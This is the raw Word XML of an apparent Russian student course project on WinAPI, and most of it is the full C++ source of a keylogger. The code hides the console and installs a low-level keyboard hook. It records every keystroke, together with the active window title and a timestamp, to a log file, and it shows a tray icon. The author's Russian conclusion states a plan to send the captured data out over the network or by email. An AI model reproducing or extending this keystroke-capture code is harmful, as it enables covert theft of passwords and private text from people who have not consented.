          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(MB_ICONERROR);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 xml:space="preserve">        std::string word;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 xml:space="preserve">        while (in &gt;&gt; word) {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 xml:space="preserve">            std::transform(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>word.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>word.end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>word.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(),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[](char c) { return std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tolower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(c); });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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dict.insert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(word);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C6F4D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spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();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 xml:space="preserve">    bool check(std::string &amp;str) {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 xml:space="preserve">        std::transform(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str.end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(),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[](char c) { return std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tolower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(c); });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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dict.count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(str);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  <w:t>};</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA65761" w14:textId="4C387A52" w:rsidR="003C6F4D" w:rsidRDefault="003C6F4D" w:rsidP="003C6F4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:contextualSpacing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main.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8EA36" w14:textId="77777777" w:rsidR="003C6F4D" w:rsidRPr="003C6F4D" w:rsidRDefault="003C6F4D" w:rsidP="003C6F4D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3C6F4D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windows.h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&gt;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>#include &lt;iostream&gt;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>#include &lt;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fstream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&gt;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>#include &lt;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ctime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&gt;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lastRenderedPageBreak/>
        <w:br/>
        <w:t>#include "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dictionary.h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"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>/*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* A hook is a point in the system message-handling mechanism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* where an application can install a subroutine to monitor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* the message traffic in the system and process certain types of messages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* before they reach the target window procedure.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*/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>HHOOK hook; // handler to the hook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>// contains information about a low-level keyboard input event.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KBDLLHOOKSTRUCT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KBStruct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>// contains information that the system needs to display notifications in the notification area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NOTIFYICONDATA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nid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 {0};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>std::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ofstream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file; // for output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char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PrevProgName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[256]; // name of program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dictionary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dict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>std::string buffer;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void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CheckWord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(std::string&amp;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) {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if (!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buf.empty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() &amp;&amp; !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dict.check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)) {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MessageBeep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(MB_ICONEXCLAMATION);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}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buf.clear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>}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void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WriteToLog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(int key) {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// mouse click -&gt; skipping it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if (key == 1 || key == 2) {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return;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}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// HWND - handler to the window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HWND foreground =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GetForegroundWindow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// DWORD == unsigned int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DWORD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ThreadID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// HKL - handler to the keyboard layout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HKL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KeyboardLayout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ThreadID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GetWindowThreadProcessId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(foreground, NULL);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KeyboardLayout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GetKeyboardLayout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ThreadID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if (foreground) {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// there is a program in foreground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char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CurProgName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[256];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GetWindowTextA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(foreground,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CurProgName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, 256);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if (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strcmp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CurProgName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PrevProgName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) != 0) {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PrevProgName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CurProgName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time_t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CurTime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 time(NULL);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struct tm *tm =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localtime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(&amp;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CurTime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char time[64];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strftime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(time,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(time), "%c", tm);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file &lt;&lt; std::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&lt;&lt; "[" &lt;&lt;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CurProgName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&lt;&lt; " | " &lt;&lt; time &lt;&lt; "]" &lt;&lt; std::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}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lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    }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switch (key) {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case VK_BACK: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file &lt;&lt; "[BACKSPACE]";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if (!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buffer.empty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()) {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buffer.pop_back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}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break;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case VK_RETURN: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file &lt;&lt; "\n";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CheckWord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(buffer);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break;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case VK_SPACE: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file &lt;&lt; " ";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CheckWord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(buffer);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break;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case VK_TAB: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file &lt;&lt; "[TAB]";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CheckWord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(buffer);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break;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case VK_SHIFT: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case VK_LSHIFT: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case VK_RSHIFT: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case VK_CONTROL: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case VK_LCONTROL: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case VK_RCONTROL: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case VK_MENU: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case VK_LMENU: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case VK_RMENU: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case VK_CAPITAL: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break;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case VK_ESCAPE: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file &lt;&lt; "[ESC]";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break;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case VK_END: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file &lt;&lt; "[END]";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break;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case VK_HOME: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file &lt;&lt; "[HOME]";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break;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case VK_UP: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file &lt;&lt; "[UP]";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break;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case VK_DOWN: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file &lt;&lt; "[DOWN]";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break;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case VK_LEFT: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file &lt;&lt; "[LEFT]";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break;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case VK_RIGHT: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file &lt;&lt; "[RIGHT]";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break;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default: {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bool lower;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if ((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GetKeyState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(VK_CAPITAL) &amp; 0x0001) != 0) {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// If the low-order bit is 1, the key is toggled.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lower = true;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} else {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lower = false;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}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if ((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GetKeyState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(VK_SHIFT) &amp; 0x1000) != 0) {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// If the high-order bit is 1, the key is down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lower = !lower;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}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BYTE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KeyboardState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[256];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GetKeyboardState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KeyboardState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wchar_t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UnicodeKey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char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CurKey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ToUnicodeEx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(key,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MapVirtualKey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(key, MAPVK_VK_TO_VSC),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KeyboardState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, &amp;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UnicodeKey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, 1, 0,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KeyboardLayout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// maps a UTF-16 string to a new character string.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WideCharToMultiByte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(CP_ACP, 0, &amp;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UnicodeKey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, -1, &amp;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CurKey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, 1, NULL, NULL);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// key will be in upper case by default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if (!lower) {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CurKey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tolower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CurKey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}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if (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CurKey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== ',' ||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CurKey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== '.' ||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CurKey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== '!' ||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CurKey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== '?' ||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CurKey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== ':' ||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CurKey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== ';' ||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CurKey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== ')' ||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CurKey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== '(') {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CheckWord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(buffer);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file &lt;&lt;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CurKey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}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else if (std::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iswalpha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UnicodeKey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)) {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file &lt;&lt;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CurKey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buffer.push_back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CurKey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}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}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}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file.flush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>}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>// activates if the key is pressed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LRESULT CALLBACK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HookCallBack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(int code, WPARAM message, LPARAM event) {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if (code &gt;= 0) {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if (message == WM_KEYDOWN || message == WM_SYSKEYDOWN) {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// getting info about pressed key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KBStruct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 *((KBDLLHOOKSTRUCT*)event);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WriteToLog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KBStruct.vkCode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}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}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// passes the hook information to the next hook procedure in the current hook chain.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return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CallNextHookEx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(hook, code, message, event);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>}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>// processes messages sent to a window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LRESULT CALLBACK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WindowProc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(HWND window, UINT message, WPARAM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wParam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, LPARAM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lParam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) {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switch (message) {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// message from icon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case WM_USER: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if (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lParam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== WM_RBUTTONDOWN)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if (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MessageBox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(NULL, TEXT("Close keylogger?"), TEXT("Keylogger"), MB_YESNO) == IDYES) {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DestroyWindow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(window);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Shell_NotifyIconA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(NIM_DELETE, &amp;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nid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}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break;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case WM_DESTROY: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// indicates to the system that a thread has made a request to terminate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PostQuitMessage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(0);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break;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default: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// calls the default window procedure to provide default processing for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// any window messages that an application does not process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    return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DefWindowProc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(window, message,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wParam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lParam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}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>}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int WINAPI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WinMain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(HINSTANCE instance, HINSTANCE, LPTSTR, int) {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ShowWindow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FindWindowA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ConsoleWindowClass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", NULL), SW_HIDE);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setlocale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(LC_ALL, "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russian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");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// registering new window class (it is needed for tray icon)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WNDCLASSEX main = { 0 }; // contains window class information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main.cbSize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(WNDCLASSEX); // size of structure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main.hInstance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 instance; // handle to the instance that contains window procedure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main.lpszClassName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 TEXT("Main"); // class name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main.lpfnWndProc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WindowProc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; // window procedure function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RegisterClassEx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(&amp;main);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// creating main window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HWND window =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CreateWindowEx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(0, "Main", NULL, 0, 0, 0, 0, 0, NULL, NULL, instance, NULL);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nid.cbSize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(NOTIFYICONDATA); // size of structure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nid.hWnd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 window; // handle to the window that receives notifications associated with an icon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nid.uFlags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 NIF_MESSAGE | NIF_ICON | NIF_TIP; // shows that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uCallbackMessage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hIcon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szTip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are valid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nid.uCallbackMessage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 WM_USER;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nid.hIcon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LoadIcon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(NULL, IDI_WARNING); // handle to icon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sprintf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nid.szTip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, "Keylogger is active. Right click to close");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Shell_NotifyIconA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(NIM_ADD, &amp;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nid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//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file.open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("log.txt", std::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ios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::app); // we'll write to the end of file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file.open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("log.txt", std::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ios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::out | std::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ios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trunc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// installing hook that monitors low-level keyboard events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hook =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SetWindowsHookEx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 xml:space="preserve">(WH_KEYBOARD_LL,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HookCallBack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, NULL, 0);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// MSG contains message information from a thread's MQ.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MSG message;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// retrieves messages for any window that belongs to the current thread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while (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GetMessage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(&amp;message, NULL, 0, 0)) {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TranslateMessage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(&amp;message);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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DispatchMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(&amp;message);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 xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E062C74" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="003C6F4D" w:rsidRDefault="00C73D00" w:rsidP="00C73D0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E45487" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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D00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AAC5682" w14:textId="46ACB39E" w:rsidR="007F7D43" w:rsidRPr="005D6B23" w:rsidRDefault="007C1841" w:rsidP="007C18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данного курсового проекта я </w:t>
      </w:r>
      <w:r w:rsidR="00F94EA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знакомился с функциями и возможностями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Оказалось, что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C1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предоставляет широкий спектр функций для взаимодействия с системой (по некоторым данным их больше 15 тысяч). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D6B23" w:rsidRPr="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D6B23" w:rsidRPr="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> даёт программисту почти полную власть над системой. </w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Мне понадобилось достаточно много времени, чтобы познакомиться с основными функциями для работы с </w:t>
      </w:r>
      <w:r w:rsidR="00F94EA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94EA8" w:rsidRPr="00F94EA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и изучить некоторые структуры, необходимы</w:t>
      </w:r>
      <w:r w:rsidR="00F94EA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для выполнения задания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605377DE" w14:textId="46423E90" w:rsidR="007C1841" w:rsidRDefault="007C1841" w:rsidP="007C18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</w:t>
      </w:r>
      <w:r w:rsidR="005D6B23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был</w:t>
      </w:r>
      <w:r w:rsidR="005D6B23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исследован</w:t>
      </w:r>
      <w:r w:rsidR="005D6B2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механизм</w:t>
      </w:r>
      <w:r w:rsidR="005D6B2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перехвата </w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сообщений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> при помощи хуков</w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F94EA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>обработки поступающих сообщений</w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, способы взаимодействия с окнами и системным </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>треем</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и правила проектирования </w:t>
      </w:r>
      <w:r w:rsidR="005D6B23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="005D6B23" w:rsidRPr="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="005D6B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7666EB62" w14:textId="6A189FB2" w:rsidR="00F94EA8" w:rsidRPr="005D6B23" w:rsidRDefault="00F94EA8" w:rsidP="007C18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Полученные знания я применил для написания программы-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кейлоггера</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. В дальнейшем я планирую усовершенствовать свою программу: реализовать передачу данных по сети или по электронной почте.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F94EA8" w:rsidRPr="005D6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20CE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE7EA172"/>
    <w:lvl w:ilvl="0" w:tplc="283282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E3A06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC088D0C"/>
    <w:lvl w:ilvl="0" w:tplc="6C020E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A357B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E1AD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43"/>
    <w:rsid w:val="001E0217"/>
    <w:rsid w:val="003C6F4D"/>
    <w:rsid w:val="005D6B23"/>
    <w:rsid w:val="007C1841"/>
    <w:rsid w:val="007F7D43"/>
    <w:rsid w:val="008E7774"/>
    <w:rsid w:val="008F0DB7"/>
    <w:rsid w:val="00976AF7"/>
    <w:rsid w:val="009E7CBC"/>
    <w:rsid w:val="00C73D00"/>
    <w:rsid w:val="00CB7A0F"/>
    <w:rsid w:val="00EC16AF"/>
    <w:rsid w:val="00F34B61"/>
    <w:rsid w:val="00F9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346DE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{596D04CC-0564-45DD-A790-01047E07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2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2033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Илья Мося</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-23T10:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-25T17:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>